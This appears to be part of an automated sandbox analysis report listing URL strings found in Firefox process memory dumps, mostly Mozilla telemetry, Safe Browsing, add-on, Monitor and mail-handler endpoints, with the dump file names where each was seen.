Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000003.2755657148.000001DEF0CC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997922183.000001DEEA4A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/3aaa7c43-9c88-40ac-93a5-c993
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755694462.000001DEEF0A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000003.2755694462.000001DEEF0D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yandex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rf
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E8C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comhttps://truecolors.firefox.comhttps://support.mozilla.orgbrowser.tabs.dra
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001C.00000003.2884308105.000001DEFA2E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/value=label
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comremoveTabsProgressListenerpictureinpicture.settingsaccount-connection
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2UPDATE
